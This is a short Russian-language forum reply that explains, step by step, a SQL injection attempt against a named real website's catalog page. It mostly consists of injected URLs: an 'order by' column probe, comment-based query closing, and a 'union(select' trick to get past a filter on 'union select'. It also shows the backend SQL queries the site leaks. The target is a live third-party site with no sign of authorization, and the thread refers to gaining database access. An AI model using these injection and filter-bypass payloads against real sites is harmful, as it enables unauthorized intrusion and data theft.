Axel_Ustus:
Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:
1) При запросе "order by 2" нам возвращается sql запрос:
Код:
Code:
select categories_id from t_products_to_categories where product_id = 589 order by 2--
И мы видим, что запрашивается одно поле
2) Закроем запрос
Код:
Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1
3) Попробуем написать union select после закрытия:
Код:
Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union select
Мы видим ошибку, следовательно union select блочится
4)
Код:
Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select
Ошибки нет
5)
Код:
Code:
http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1
И запрос, который нам вернулся:
Код:
Code:
select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2
Из этого следует, что тут несколько запросов, и union работать не будет)